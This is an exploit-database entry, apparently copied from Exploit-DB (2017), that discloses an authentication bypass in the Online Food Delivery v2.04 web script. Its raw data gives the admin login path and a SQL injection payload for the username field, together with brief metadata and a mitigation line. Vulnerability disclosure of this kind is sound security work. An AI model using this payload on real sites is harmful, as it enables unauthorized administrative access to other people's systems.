header-logo
Suggest Exploit
vendor:
Online Food Delivery
by:
Dawid Morawski
7,5
CVSS
HIGH
Authentication bypass
287
CWE
Product Name: Online Food Delivery
Affected Version From: v2.04
Affected Version To: v2.04
Patch Exists: NO
Related CWE: N/A
CPE: a:itechscripts:online_food_delivery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Online Food Delivery v2.04 Authentication bypass

An attacker can bypass authentication by setting the username to '1' or 1=1 -- - and any password.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

# Vulnerability: Online Food Delivery v2.04 Authentication bypass
# Date: 12.01.2017
# Software link: http://itechscripts.com/food-delivery/
# Demo: http://restaurant.itechscripts.com
# Price: 49$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################


Go to http://localhost/[PATH]/admin/admin_login.php and set:

Username: 1' or 1=1 -- -
Password: anything